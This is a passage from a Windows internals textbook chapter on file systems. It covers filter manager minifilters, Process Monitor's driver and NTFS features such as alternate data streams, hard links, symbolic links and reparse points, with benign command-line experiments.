■ Legacy file system filter drivers usually create one or multiple device objects and attach them on the file system device through the IoAttachDeviceToDeviceStack API. Legacy filter drivers intercept all the requests coming from the cache manager or I/O manager and must implement both standard IRP dispatch functions and the Fast I/O path. Due to the complexity involved in the development of this kind of driver (synchronization issues, undocumented interfaces, dependency on the original file system, and so on), Microsoft has developed a unified filter model that makes use of special drivers, called minifilters, and deprecated legacy file system filter drivers. (The IoAttachDeviceToDeviceStack API fails when it's called for DAX volumes.)
■ Minifilter drivers are clients of the Filesystem Filter Manager (Fltmgr.sys). The Filesystem Filter Manager is a legacy file system filter driver that provides a rich and documented interface for the creation of file system filters, hiding the complexity behind all the interactions between the file system drivers and the cache manager. Minifilters register with the filter manager through the FltRegisterFilter API. The caller usually specifies an instance setup routine and different operation callbacks. The instance setup is called by the filter manager for every valid volume device that a file system manages. The minifilter has the chance to decide whether to attach to the volume. Minifilters can specify a Pre and Post operation callback for every major IRP function code, as well as certain "pseudo-operations" that describe internal memory manager or cache manager semantics that are relevant to file system access patterns. The Pre callback is executed before the I/O is processed by the file system driver, whereas the Post callback is executed after the I/O operation has been completed. The Filter Manager also provides its own communication facility that can be employed between minifilter drivers and their associated user-mode application.
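The pre/post callback flow can be modeled in miniature (this is a toy dispatcher, not the Fltmgr API; every class and callback name below is invented): the "filter manager" runs each registered filter's pre callback before handing the operation to the "file system," and the post callbacks after it completes.

```python
class FilterManager:
    def __init__(self, fs):
        self.fs = fs               # the underlying "file system" callable
        self.filters = []          # registered (pre, post) callback pairs

    def register(self, pre=None, post=None):
        self.filters.append((pre, post))

    def dispatch(self, op):
        for pre, _ in self.filters:
            if pre and pre(op) == "deny":      # a pre callback may fail the I/O
                return "ACCESS_DENIED"
        result = self.fs(op)                   # the FSD processes the operation
        for _, post in reversed(self.filters): # post runs after completion
            if post:
                post(op, result)
        return result

seen = []
fm = FilterManager(fs=lambda op: f"ok:{op}")
fm.register(pre=lambda op: seen.append(("pre", op)))
fm.register(pre=lambda op: "deny" if op == "infected.exe" else None,
            post=lambda op, r: seen.append(("post", op)))
assert fm.dispatch("clean.txt") == "ok:clean.txt"
assert fm.dispatch("infected.exe") == "ACCESS_DENIED"
```

The second filter behaves like the malware-scanner scenario discussed later in this section: it fails the operation before it ever reaches the file system.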
The ability to see all file system requests and optionally modify or complete them enables a range
of applications, including remote file replication services, file encryption, efficient backup, and licens-
ing. Every anti-malware product typically includes at least a minifilter driver that intercepts applications
opening or modifying files. For example, before propagating the IRP to the file system driver to which
the command is directed, a malware scanner examines the file being opened to ensure that it’s clean.
If the file is clean, the malware scanner passes the IRP on, but if the file is infected, the malware scan-
ner quarantines or cleans the file. If the file can’t be cleaned, the driver fails the IRP (typically with an
access-denied error) so that the malware cannot become active.
Deeply describing the entire minifilter and legacy filter driver architecture is outside the scope
of this chapter. You can find more information on the legacy filter driver architecture in Chapter 6,
“I/O System,” of Part 1. More details on minifilters are available in MSDN (https://docs.microsoft.com
/en-us/windows-hardware/drivers/ifs/file-system-minifilter-drivers).
Data-scan sections
Starting with Windows 8.1, the Filter Manager collaborates with file system drivers to provide data-scan
section objects that can be used by anti-malware products. Data-scan section objects are similar to
standard section objects (for more information about section objects, see Chapter 5 of Part 1) except
for the following:
■ Data-scan section objects can be created from minifilter callback functions, namely from callbacks that manage the IRP_MJ_CREATE function code. These callbacks are called by the filter manager when an application is opening or creating a file. An anti-malware scanner can create a data-scan section and then start scanning before completing the callback.
■ FltCreateSectionForDataScan, the API used for creating data-scan sections, accepts a FILE_OBJECT pointer. This means that callers don't need to provide a file handle. The file handle typically doesn't yet exist, and would thus need to be (re)created by using the FltCreateFile API, which would then have created other file creation IRPs, recursively interacting with lower-level file system filters once again. With the new API, the process is much faster because these extra recursive calls won't be generated.
A data-scan section can be mapped like a normal section using the traditional API. This allows anti-
malware applications to implement their scan engine either as a user-mode application or in a kernel-
mode driver. When the data-scan section is mapped, IRP_MJ_READ events are still generated in the mini-
filter driver, but this is not a problem because the minifilter doesn’t have to include a read callback at all.
Filtering named pipes and mailslots
When a process belonging to a user application needs to communicate with another entity (a pro-
cess, kernel driver, or remote application), it can leverage facilities provided by the operating system.
The most traditionally used are named pipes and mailslots, because they are portable among other
operating systems as well. A named pipe is a named, one-way communication channel between a pipe
server and one or more pipe clients. All instances of a named pipe share the same pipe name, but each
instance has its own buffers and handles, and provides a separate channel for client/server communi-
cation. Named pipes are implemented through a file system driver, the NPFS driver (Npfs.sys).
A mailslot is a multi-way communication channel between a mailslot server and one or more clients.
A mailslot server is a process that creates a mailslot through the CreateMailslot Win32 API, and can only
read small messages (424 bytes maximum when sent between remote computers) generated by one or
more clients. Clients are processes that write messages to the mailslot. Clients connect to the mailslot
through the standard CreateFile API and send messages through the WriteFile function. Mailslots are
generally used for broadcasting messages within a domain. If several server processes in a domain each
create a mailslot using the same name, every message that is addressed to that mailslot and sent to the
domain is received by the participating processes. Mailslots are implemented through the Mailslot file
system driver, Msfs.sys.
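The broadcast semantics described above can be sketched with an in-memory stand-in (this is not the Msfs.sys driver; the `Domain` class and its queues are invented for illustration): every server that created a mailslot with the same name receives a copy of each message sent to that name, and messages to remote mailslots are capped at 424 bytes.

```python
REMOTE_MAX = 424   # maximum message size between remote computers

class Domain:
    def __init__(self):
        self.mailslots = {}                    # name -> list of server queues

    def create_mailslot(self, name):
        q = []
        self.mailslots.setdefault(name, []).append(q)
        return q                               # the server reads from this queue

    def send(self, name, message, remote=True):
        if remote and len(message) > REMOTE_MAX:
            raise ValueError("message too large for a remote mailslot")
        for q in self.mailslots.get(name, []): # broadcast to every instance
            q.append(message)

d = Domain()
a = d.create_mailslot(r"\\.\mailslot\announce")
b = d.create_mailslot(r"\\.\mailslot\announce")
d.send(r"\\.\mailslot\announce", b"hello")
assert a == [b"hello"] and b == [b"hello"]     # both servers got the message
```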
Both the mailslot and NPFS driver implement simple file systems. They manage namespaces com-
posed of files and directories, which support security, can be opened, closed, read, written, and so on.
Describing the implementation of the two drivers is outside the scope of this chapter.
Starting with Windows 8, mailslots and named pipes are supported by the Filter Manager. Minifilters
are able to attach to the mailslot and named pipe volumes (\Device\NamedPipe and \Device\Mailslot,
which are not real volumes), through the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag specified
at registration time. A minifilter can then intercept and modify all the named pipe and mailslot I/O
that happens between local and remote process and between a user application and its kernel driver.
Furthermore, minifilters can open or create a named pipe or mailslot without generating recursive
events through the FltCreateNamedPipeFile or FltCreateMailslotFile APIs.
Note One of the motivations that explains why the named pipe and mailslot file system
drivers are simpler compared to NTFS and ReFS is that they do not interact heavily with
the cache manager. The named pipe driver implements the Fast I/O path but with no
cached read or write-behind support. The mailslot driver does not interact with the cache
manager at all.
Controlling reparse point behavior
The NTFS file system supports the concept of reparse points, blocks of 16 KB of application and system-
defined reparse data that can be associated to single files. (Reparse points are discussed more in mul-
tiple sections later in this chapter.) Some types of reparse points, like volume mount points or symbolic
links, contain a link between the original file (or an empty directory), used as a placeholder, and an-
other file, which can even be located in another volume. When the NTFS file system driver encounters
a reparse point on its path, it returns an error code to the upper driver in the device stack. The latter
(which could be another filter driver) analyzes the reparse point content and, in the case of a symbolic
link, re-emits another I/O to the correct volume device.
This process is complex and cumbersome for any filter driver. Minifilter drivers can intercept the
STATUS_REPARSE error code and reopen the reparse point through the new FltCreateFileEx2 API,
which accepts a list of Extra Create Parameters (also known as ECPs), used to fine-tune the behavior
of the opening/creation process of a target file in the minifilter context. In general, the Filter Manager
supports different ECPs, and each of them is uniquely identified by a GUID. The Filter Manager pro-
vides multiple documented APIs that deal with ECPs and ECP lists. Usually, minifilters allocate an
ECP with the FltAllocateExtraCreateParameter function, populate it, and insert it into a list (through
FltInsertExtraCreateParameter) before calling the Filter Manager’s I/O APIs.
The FLT_CREATEFILE_TARGET extra creation parameter allows the Filter Manager to manage cross-
volume file creation automatically (the caller needs to specify a flag). Minifilters don’t need to perform
any other complex operation.
With the goal of supporting container isolation, it's also possible to set a reparse point on nonempty directories and to create new files that have directory reparse points. The default behavior that the file system applies when it encounters a nonempty directory reparse
point depends on whether the reparse point is applied in the last component of the file full path. If this
is the case, the file system returns the STATUS_REPARSE error code, just like for an empty directory;
otherwise, it continues to walk the path.
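The rule just described can be sketched as a path walk (a simplified model, not NTFS code; the `walk` function and its tuple encoding are assumptions of this sketch): a reparse point on the final component, or an ordinary reparse point anywhere, stops the walk with STATUS_REPARSE, while a nonempty-directory reparse point mid-path is walked through.

```python
def walk(components, reparse_info):
    """reparse_info maps a component name to (has_reparse, is_nonempty_dir)."""
    for i, comp in enumerate(components):
        has_reparse, nonempty = reparse_info.get(comp, (False, False))
        if not has_reparse:
            continue
        last = i == len(components) - 1
        if last or not nonempty:
            return "STATUS_REPARSE", comp   # caller must handle the reparse
        # Nonempty directory reparse point that is not the last
        # component: keep walking the path.
    return "STATUS_SUCCESS", None

info = {"mount": (True, False), "layer": (True, True)}
assert walk(["users", "mount", "file.txt"], info) == ("STATUS_REPARSE", "mount")
assert walk(["users", "layer", "file.txt"], info) == ("STATUS_SUCCESS", None)
assert walk(["users", "layer"], info) == ("STATUS_REPARSE", "layer")
```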
The Filter Manager is able to correctly deal with this new kind of reparse point through another ECP
(named TYPE_OPEN_REPARSE). The ECP includes a list of descriptors (OPEN_REPARSE_LIST_ENTRY
data structure), each of which describes the type of reparse point (through its Reparse Tag), and the
behavior that the system should apply when it encounters a reparse point of that type while parsing
a path. Minifilters, after they have correctly initialized the descriptor list, can apply the new behavior in
different ways:
■ Issue a new open (or create) operation on a file that resides in a path that includes a reparse point in any of its components, using the FltCreateFileEx2 function. This procedure is similar to the one used by the FLT_CREATEFILE_TARGET ECP.
■ Apply the new reparse point behavior globally to any file that the Pre-Create callback intercepts. The FltAddOpenReparseEntry and FltRemoveOpenReparseEntry APIs can be used to set the reparse point behavior to a target file before the file is actually created (the pre-creation callback intercepts the file creation request before the file is created). The Windows Container Isolation minifilter driver (Wcifs.sys) uses this strategy.
Process Monitor
Process Monitor (Procmon), a system activity-monitoring utility from Sysinternals that has been used
throughout this book, is an example of a passive minifilter driver, which is one that does not modify the
flow of IRPs between applications and file system drivers.
Process Monitor works by extracting a file system minifilter device driver from its executable image
(stored as a resource inside Procmon.exe) the first time you run it after a boot, installing the driver in
memory, and then deleting the driver image from disk (unless configured for persistent boot-time
monitoring). Through the Process Monitor GUI, you can direct the driver to monitor file system activity
on local volumes that have assigned drive letters, network shares, named pipes, and mail slots. When
the driver receives a command to start monitoring a volume, it registers filtering callbacks with the
Filter Manager, which is attached to the device object that represents a mounted file system on the
volume. After an attach operation, the I/O manager redirects an IRP targeted at the underlying device
object to the driver owning the attached device, in this case the Filter Manager, which sends the event
to registered minifilter drivers, in this case Process Monitor.
When the Process Monitor driver intercepts an IRP, it records information about the IRP’s com-
mand, including target file name and other parameters specific to the command (such as read and
write lengths and offsets) to a nonpaged kernel buffer. Every 500 milliseconds, the Process Monitor GUI
program sends an IRP to Process Monitor’s interface device object, which requests a copy of the buf-
fer containing the latest activity, and then displays the activity in its output window. Process Monitor
shows all file activity as it occurs, which makes it an ideal tool for troubleshooting file system–related
system and application failures. To run Process Monitor the first time on a system, an account must
have the Load Driver and Debug privileges. After loading, the driver remains resident, so subsequent
executions require only the Debug privilege.
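The driver-to-GUI polling scheme is essentially a producer/consumer pattern, sketched here with an in-memory stand-in for the nonpaged kernel buffer (the class and method names are invented; the real driver exposes this through an interface device object): the driver appends event records as IRPs are intercepted, and the GUI periodically drains a copy of everything logged since the last poll.

```python
class MonitorDriver:
    def __init__(self):
        self.buffer = []                       # stands in for the kernel buffer

    def intercept(self, operation, path, **params):
        # Record the IRP's command, target file name, and command-specific
        # parameters (such as read/write lengths and offsets).
        self.buffer.append({"op": operation, "path": path, **params})

    def drain(self):
        # The GUI's periodic request: hand over the batch and reset the buffer.
        events, self.buffer = self.buffer, []
        return events

drv = MonitorDriver()
drv.intercept("WriteFile", r"C:\log.txt", offset=0, length=512)
drv.intercept("Open", r"C:\data.bin")
batch = drv.drain()
assert [e["op"] for e in batch] == ["WriteFile", "Open"]
assert drv.drain() == []                       # buffer was emptied by the poll
```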
When you run Process Monitor, it starts in basic mode, which shows the file system activity most
often useful for troubleshooting. When in basic mode, Process Monitor omits certain file system opera-
tions from being displayed, including
■ I/O to NTFS metadata files
■ I/O to the paging file
■ I/O generated by the System process
■ I/O generated by the Process Monitor process
While in basic mode, Process Monitor also reports file I/O operations with friendly names rather
than with the IRP types used to represent them. For example, both IRP_MJ_WRITE and FASTIO_WRITE
operations display as WriteFile, and IRP_MJ_CREATE operations show as Open if they represent an open
operation and as Create for the creation of new files.
EXPERIMENT: Viewing Process Monitor’s minifilter driver
To see which file system minifilter drivers are loaded, start an Administrative command prompt,
and run the Filter Manager control program (%SystemRoot%\System32\Fltmc.exe). Start Process
Monitor (ProcMon.exe) and run Fltmc again. You see that the Process Monitor’s filter driver
(PROCMON20) is loaded and has a nonzero value in the Instances column. Now, exit Process
Monitor and run Fltmc again. This time, you see that the Process Monitor’s filter driver is still
loaded, but now its instance count is zero.
The NT File System (NTFS)
In the following section, we analyze the internal architecture of the NTFS file system, starting by look-
ing at the requirements that drove its design. We examine the on-disk data structures, and then we
move on to the advanced features provided by the NTFS file system, like the Recovery support, tiered
volumes, and the Encrypting File System (EFS).
High-end file system requirements
From the start, NTFS was designed to include features required of an enterprise-class file system. To
minimize data loss in the face of an unexpected system outage or crash, a file system must ensure that
the integrity of its metadata is guaranteed at all times; and to protect sensitive data from unauthorized
access, a file system must have an integrated security model. Finally, a file system must allow for soft-
ware-based data redundancy as a low-cost alternative to hardware-redundant solutions for protecting
user data. In this section, you find out how NTFS implements each of these capabilities.
CHAPTER 11
Caching and file systems
629
Recoverability
To address the requirement for reliable data storage and data access, NTFS provides file system recov-
ery based on the concept of an atomic transaction. Atomic transactions are a technique for handling
modifications to a database so that system failures don’t affect the correctness or integrity of the
database. The basic tenet of atomic transactions is that some database operations, called transactions,
are all-or-nothing propositions. (A transaction is defined as an I/O operation that alters file system data
or changes the volume’s directory structure.) The separate disk updates that make up the transaction
must be executed atomically—that is, once the transaction begins to execute, all its disk updates must
be completed. If a system failure interrupts the transaction, the part that has been completed must be
undone, or rolled back. The rollback operation returns the database to a previously known and consis-
tent state, as if the transaction had never occurred.
NTFS uses atomic transactions to implement its file system recovery feature. If a program initiates
an I/O operation that alters the structure of an NTFS volume—that is, changes the directory structure,
extends a file, allocates space for a new file, and so on—NTFS treats that operation as an atomic trans-
action. It guarantees that the transaction is either completed or, if the system fails while executing the
transaction, rolled back. The details of how NTFS does this are explained in the section “NTFS recovery
support” later in the chapter. In addition, NTFS uses redundant storage for vital file system information
so that if a sector on the disk goes bad, NTFS can still access the volume’s critical file system data.
Security
Security in NTFS is derived directly from the Windows object model. Files and directories are protected
from being accessed by unauthorized users. (For more information on Windows security, see Chapter
7, “Security,” in Part 1.) An open file is implemented as a file object with a security descriptor stored on
disk in the hidden $Secure metafile, in a stream named $SDS (Security Descriptor Stream). Before a
process can open a handle to any object, including a file object, the Windows security system verifies
that the process has appropriate authorization to do so. The security descriptor, combined with the
requirement that a user log on to the system and provide an identifying password, ensures that no pro-
cess can access a file unless it is given specific permission to do so by a system administrator or by the
file’s owner. (For more information about security descriptors, see the section “Security descriptors and
access control” in Chapter 7 in Part 1).
Data redundancy and fault tolerance
In addition to recoverability of file system data, some customers require that their data not be endan-
gered by a power outage or catastrophic disk failure. The NTFS recovery capabilities ensure that the
file system on a volume remains accessible, but they make no guarantees for complete recovery of user
files. Protection for applications that can’t risk losing file data is provided through data redundancy.
Data redundancy for user files is implemented via the Windows layered driver, which provides
fault-tolerant disk support. NTFS communicates with a volume manager, which in turn communicates
with a disk driver to write data to a disk. A volume manager can mirror, or duplicate, data from one disk
onto another disk so that a redundant copy can always be retrieved. This support is commonly called
RAID level 1. Volume managers also allow data to be written in stripes across three or more disks, using
the equivalent of one disk to maintain parity information. If the data on one disk is lost or becomes
inaccessible, the driver can reconstruct the disk’s contents by means of exclusive-OR operations. This
support is called RAID level 5.
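The exclusive-OR arithmetic behind RAID level 5 reconstruction can be sketched in a few lines. This is an illustration of the parity math only, not of the volume manager's actual striping code:

```python
from functools import reduce

def stripe_parity(blocks):
    """XOR equal-length data blocks byte by byte to form the parity block."""
    return bytes(reduce(lambda a, b: a ^ b, column) for column in zip(*blocks))

def rebuild(survivors, parity):
    """Reconstruct a lost block: XOR the surviving blocks with the parity."""
    return stripe_parity(survivors + [parity])
```

Because x ^ x == 0, XOR-ing the parity block with every surviving block cancels their contributions and leaves exactly the bytes of the missing block.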
In Windows 7, data redundancy for NTFS implemented via the Windows layered driver was provided
by Dynamic Disks. Dynamic Disks had multiple limitations, which have been overcome in Windows 8.1
by introducing a new technology that virtualizes the storage hardware, called Storage Spaces. Storage
Spaces is able to create virtual disks that already provide data redundancy and fault tolerance. The
volume manager doesn’t differentiate between a virtual disk and a real disk (so user mode components
can’t see any difference between the two). The NTFS file system driver cooperates with Storage Spaces
for supporting tiered disks and RAID virtual configurations. Storage Spaces and Spaces Direct will be
covered later in this chapter.
Advanced features of NTFS
In addition to NTFS being recoverable, secure, reliable, and efficient for mission-critical systems, it
includes the following advanced features that allow it to support a broad range of applications. Some
of these features are exposed as APIs for applications to leverage, and others are internal features:
■ Multiple data streams
■ Unicode-based names
■ General indexing facility
■ Dynamic bad-cluster remapping
■ Hard links
■ Symbolic (soft) links and junctions
■ Compression and sparse files
■ Change logging
■ Per-user volume quotas
■ Link tracking
■ Encryption
■ POSIX support
■ Defragmentation
■ Read-only support and dynamic partitioning
■ Tiered volume support
The following sections provide an overview of these features.
Multiple data streams
In NTFS, each unit of information associated with a file—including its name, its owner, its time stamps,
its contents, and so on—is implemented as a file attribute (NTFS object attribute). Each attribute con-
sists of a single stream—that is, a simple sequence of bytes. This generic implementation makes it easy
to add more attributes (and therefore more streams) to a file. Because a file’s data is “just another at-
tribute” of the file and because new attributes can be added, NTFS files (and file directories) can contain
multiple data streams.
An NTFS file has one default data stream, which has no name. An application can create additional,
named data streams and access them by referring to their names. To avoid altering the Windows I/O
APIs, which take a string as a file name argument, the name of the data stream is specified by append-
ing a colon (:) to the file name. Because the colon is a reserved character, it can serve as a separator
between the file name and the data stream name, as illustrated in this example:
myfile.dat:stream2
Each stream has a separate allocation size (which defines how much disk space has been reserved
for it), actual size (which is how many bytes the caller has used), and valid data length (which is how
much of the stream has been initialized). In addition, each stream is given a separate file lock that is
used to lock byte ranges and to allow concurrent access.
One component in Windows that uses multiple data streams is the Attachment Execution Service,
which is invoked whenever the standard Windows API for saving internet-based attachments is used by
applications such as Edge or Outlook. Depending on which zone the file was downloaded from (such as
the My Computer zone, the Intranet zone, or the Untrusted zone), Windows Explorer might warn the
user that the file came from a possibly untrusted location or even completely block access to the file.
For example, Figure 11-24 shows the dialog box that’s displayed when executing Process Explorer after
it was downloaded from the Sysinternals site. This type of data stream is called the Zone.Identifier and
is colloquially referred to as the “Mark of the Web.”
Note If you clear the check box for Always Ask Before Opening This File, the zone identifier
data stream will be removed from the file.
FIGURE 11-24 Security warning for files downloaded from the internet.
Other applications can use the multiple data stream feature as well. A backup utility, for example,
might use an extra data stream to store backup-specific time stamps on files. Or an archival utility
might implement hierarchical storage in which files that are older than a certain date or that haven’t
been accessed for a specified period of time are moved to offline storage. The utility could copy the file
to offline storage, set the file’s default data stream to 0, and add a data stream that specifies where the
file is stored.
EXPERIMENT: Looking at streams
Most Windows applications aren’t designed to work with alternate named streams, but both the
echo and more commands are. Thus, a simple way to view streams in action is to create a named
stream using echo and then display it using more. The following command sequence creates a
file named test with a stream named stream:
c:\Test>echo Hello from a named stream! > test:stream
c:\Test>more < test:stream
Hello from a named stream!
c:\Test>
If you perform a directory listing, Test’s file size doesn’t reflect the data stored in the alternate
stream because NTFS returns the size of only the unnamed data stream for file query operations,
including directory listings.
c:\Test>dir test
Volume in drive C is OS.
Volume Serial Number is F080-620F
Directory of c:\Test
12/07/2018  05:33 PM                 0 test
               1 File(s)                  0 bytes
               0 Dir(s)  18,083,577,856 bytes free
c:\Test>
You can determine what files and directories on your system have alternate data streams
with the Streams utility from Sysinternals (see the following output) or by using the /r switch
in the dir command.
c:\Test>streams test
streams v1.60 - Reveal NTFS alternate streams.
Copyright (C) 2005-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
c:\Test\test:
:stream:$DATA 29
Unicode-based names
Like Windows as a whole, NTFS supports 16-bit Unicode 1.0/UTF-16 characters to store names of files,
directories, and volumes. Unicode allows each character in each of the world’s major languages to be
uniquely represented (Unicode can even represent emoji, or small drawings), which aids in moving data
easily from one country to another. Unicode is an improvement over the traditional representation of
international characters—using a double-byte coding scheme that stores some characters in 8 bits and
others in 16 bits, a technique that requires loading various code pages to establish the available charac-
ters. Because Unicode has a unique representation for each character, it doesn’t depend on which code
page is loaded. Each directory and file name in a path can be as many as 255 characters long and can
contain Unicode characters, embedded spaces, and multiple periods.
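The fixed-width 16-bit code units that UTF-16 uses can be observed directly with Python's codec support. This is a general illustration of the encoding, independent of NTFS:

```python
# Every character in the Basic Multilingual Plane (including accented
# Latin letters) occupies one 16-bit code unit in UTF-16; characters
# outside the BMP, such as emoji, take a surrogate pair (two code units).
name = "résumé.txt"
assert len(name.encode("utf-16-le")) == 2 * len(name)

emoji = "\U0001F642"  # a smiling-face emoji, which lies outside the BMP
assert len(emoji.encode("utf-16-le")) == 4  # surrogate pair: four bytes
```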
General indexing facility
The NTFS architecture is structured to allow indexing of any file attribute on a disk volume using a
B-tree structure. (Creating indexes on arbitrary attributes is not exported to users.) This structure
enables the file system to efficiently locate files that match certain criteria—for example, all the files in
a particular directory. In contrast, the FAT file system indexes file names but doesn’t sort them, making
lookups in large directories slow.
Several NTFS features take advantage of general indexing, including consolidated security descrip-
tors, in which the security descriptors of a volume’s files and directories are stored in a single internal
stream, have duplicates removed, and are indexed using an internal security identifier that NTFS
defines. The use of indexing by these features is described in the section “NTFS on-disk structure” later
in this chapter.
Dynamic bad-cluster remapping
Ordinarily, if a program tries to read data from a bad disk sector, the read operation fails and the data
in the allocated cluster becomes inaccessible. If the disk is formatted as a fault-tolerant NTFS volume,
however, the Windows volume manager—or Storage Spaces, depending on the component that
provides data redundancy—dynamically retrieves a good copy of the data that was stored on the
bad sector and then sends NTFS a warning that the sector is bad. NTFS will then allocate a new cluster,
replacing the cluster in which the bad sector resides, and copies the data to the new cluster. It adds
the bad cluster to the list of bad clusters on that volume (stored in the hidden metadata file $BadClus)
and no longer uses it. This data recovery and dynamic bad-cluster remapping is an especially useful
feature for file servers and fault-tolerant systems or for any application that can’t afford to lose data. If
the volume manager or Storage Spaces is not used when a sector goes bad (such as early in the boot
sequence), NTFS still replaces the cluster and doesn’t reuse it, but it can’t recover the data that was on
the bad sector.
Hard links
A hard link allows multiple paths to refer to the same file. (Hard links are not supported on directories.)
If you create a hard link named C:\Documents\Spec.doc that refers to the existing file C:\Users
\Administrator\Documents\Spec.doc, the two paths link to the same on-disk file, and you can make chang-
es to the file using either path. Processes can create hard links with the Windows CreateHardLink function.
NTFS implements hard links by keeping a reference count on the actual data, where each time
a hard link is created for the file, an additional file name reference is made to the data. This means
that if you have multiple hard links for a file, you can delete the original file name that referenced
the data (C:\Users\Administrator\Documents\Spec.doc in our example), and the other hard links
(C:\Documents\Spec.doc) will remain and point to the data. However, because hard links are on-disk
local references to data (represented by a file record number), they can exist only within the same vol-
ume and can’t span volumes or computers.
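The reference-count behavior just described is easy to observe. The sketch below uses Python's portable os.link (which calls CreateHardLink on Windows); the directory and file names are illustrative only:

```python
import os
import tempfile

def hard_link_demo():
    """Create a file, hard-link a second name to it, delete the first name."""
    d = tempfile.mkdtemp()
    target = os.path.join(d, "test.txt")
    link = os.path.join(d, "hard.txt")
    with open(target, "w") as f:
        f.write("Hello from a hard link")
    os.link(target, link)  # equivalent of mklink /H or CreateHardLink

    # Both names reference the same underlying data; the link count is 2.
    assert os.stat(link).st_nlink == 2
    assert os.path.samefile(target, link)

    # Removing the original name leaves the data reachable via the link.
    os.remove(target)
    with open(link) as f:
        return f.read()
```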
EXPERIMENT: Creating a hard link
There are two ways you can create a hard link: the fsutil hardlink create command or the mklink
utility with the /H option. In this experiment we’ll use mklink because we’ll use this utility later to cre-
ate a symbolic link as well. First, create a file called test.txt and add some text to it, as shown here.
C:\>echo Hello from a Hard Link > test.txt
Now create a hard link called hard.txt as shown here:
C:\>mklink hard.txt test.txt /H
Hardlink created for hard.txt <<===>> test.txt
If you list the directory’s contents, you’ll notice that the two files will be identical in every way,
with the same creation date, permissions, and file size; only the file names differ.
c:\>dir *.txt
Volume in drive C is OS
Volume Serial Number is F080-620F
Directory of c:\
12/07/2018  05:46 PM                26 hard.txt
12/07/2018  05:46 PM                26 test.txt
               2 File(s)                 52 bytes
               0 Dir(s)  15,150,333,952 bytes free
Symbolic (soft) links and junctions
In addition to hard links, NTFS supports another type of file-name aliasing called symbolic links or soft
links. Unlike hard links, symbolic links are strings that are interpreted dynamically and can be rela-
tive or absolute paths that refer to locations on any storage device, including ones on a different local
volume or even a share on a different system. This means that symbolic links don’t actually increase the
reference count of the original file, so deleting the original file will result in the loss of the data, and a
symbolic link that points to a nonexisting file will be left behind. Finally, unlike hard links, symbolic links
can point to directories, not just files, which gives them an added advantage.
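The contrast with hard links can be demonstrated with Python's portable os.symlink (which calls CreateSymbolicLink on Windows, where it may require the privilege discussed later in this section); the file names here are illustrative:

```python
import os
import tempfile

def symlink_demo():
    """Show that a symbolic link stores a path string, not a data reference."""
    d = tempfile.mkdtemp()
    target = os.path.join(d, "test.txt")
    link = os.path.join(d, "soft.txt")
    with open(target, "w") as f:
        f.write("data")
    os.symlink(target, link)  # equivalent of mklink or CreateSymbolicLink

    assert os.readlink(link) == target  # the link is just a stored path

    # Deleting the target leaves a dangling link behind.
    os.remove(target)
    assert not os.path.exists(link)  # following the link fails...
    assert os.path.lexists(link)     # ...but the link itself remains
    return True
```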
For example, if the path C:\Drivers is a directory symbolic link that redirects to %SystemRoot%\
System32\Drivers, an application reading C:\Drivers\Ntfs.sys actually reads %SystemRoot%\System32\
Drivers\Ntfs.sys. Directory symbolic links are a useful way to lift directories that are deep in a direc-
tory tree to a more convenient depth without disturbing the original tree’s structure or contents. The
example just cited lifts the Drivers directory to the volume’s root directory, reducing the directory
depth of Ntfs.sys from three levels to one when Ntfs.sys is accessed through the directory symbolic
link. File symbolic links work much the same way—you can think of them as shortcuts, except they’re
actually implemented on the file system instead of being .lnk files managed by Windows Explorer. Just
like hard links, symbolic links can be created with the mklink utility (without the /H option) or through
the CreateSymbolicLink API.
Because certain legacy applications might not behave securely in the presence of symbolic links,
especially across different machines, the creation of symbolic links requires the SeCreateSymbolicLink
privilege, which is typically granted only to administrators. Starting with Windows 10, and only if
Developer Mode is enabled, callers of the CreateSymbolicLink API can additionally specify the SYMBOLIC_
LINK_FLAG_ALLOW_UNPRIVILEGED_CREATE flag to overcome this limitation (this allows a standard
user to create symbolic links from the command prompt window). The file system also has a
behavior option called SymLinkEvaluation that can be configured with the following command:
fsutil behavior set SymLinkEvaluation
By default, the Windows symbolic link evaluation policy allows only local-to-local and local-to-remote
symbolic links but not the opposite, as shown here:
D:\>fsutil behavior query SymLinkEvaluation
Local to local symbolic links are enabled
Local to remote symbolic links are enabled.
Remote to local symbolic links are disabled.
Remote to Remote symbolic links are disabled.
Symbolic links are implemented using an NTFS mechanism called reparse points. (Reparse points are
discussed further in the section “Reparse points” later in this chapter.) A reparse point is a file or direc-
tory that has a block of data called reparse data associated with it. Reparse data is user-defined data
about the file or directory, such as its state or location that can be read from the reparse point by the
application that created the data, a file system filter driver, or the I/O manager. When NTFS encounters
a reparse point during a file or directory lookup, it returns the STATUS_REPARSE status code, which
signals file system filter drivers that are attached to the volume and the I/O manager to examine the
reparse data. Each reparse point type has a unique reparse tag. The reparse tag allows the component
responsible for interpreting the reparse point’s reparse data to recognize the reparse point without
having to check the reparse data. A reparse tag owner, either a file system filter driver or the I/O man-
ager, can choose one of the following options when it recognizes reparse data:
■ The reparse tag owner can manipulate the path name specified in the file I/O operation
that crosses the reparse point and let the I/O operation reissue with the altered path name.
Junctions (described shortly) take this approach to redirect a directory lookup, for example.
■ The reparse tag owner can remove the reparse point from the file, alter the file in some way,
and then reissue the file I/O operation.
There are no Windows functions for creating reparse points. Instead, processes must use the FSCTL_
SET_REPARSE_POINT file system control code with the Windows DeviceIoControl function. A process
can query a reparse point’s contents with the FSCTL_GET_REPARSE_POINT file system control code.
The FILE_ATTRIBUTE_REPARSE_POINT flag is set in a reparse point’s file attributes, so applications can
check for reparse points by using the Windows GetFileAttributes function.
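A minimal sketch of that attribute check follows, using Python's os.lstat, which on Windows surfaces the same attribute bits GetFileAttributes returns (on other platforms the field is simply absent and the check reports False). Reading the reparse data itself would require DeviceIoControl with FSCTL_GET_REPARSE_POINT, which is not shown here:

```python
import os
import stat

def is_reparse_point(path):
    """Report whether FILE_ATTRIBUTE_REPARSE_POINT is set on the file."""
    st = os.lstat(path)  # lstat: don't follow the link/reparse point itself
    attrs = getattr(st, "st_file_attributes", 0)  # populated only on Windows
    return bool(attrs & stat.FILE_ATTRIBUTE_REPARSE_POINT)
```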
Another type of reparse point that NTFS supports is the junction (also known as Volume Mount
point). Junctions are a legacy NTFS concept and work almost identically to directory symbolic links,
except they can only be local to a volume. There is no advantage to using a junction instead of a direc-
tory symbolic link, except that junctions are compatible with older versions of Windows, while directory
symbolic links are not.
As seen in the previous section, modern versions of Windows now allow the creation of reparse points
that can point to non-empty directories. The system behavior (which can be controlled from minifilter
drivers) depends on the position of the reparse point in the target file’s full path. The filter manager, NTFS,
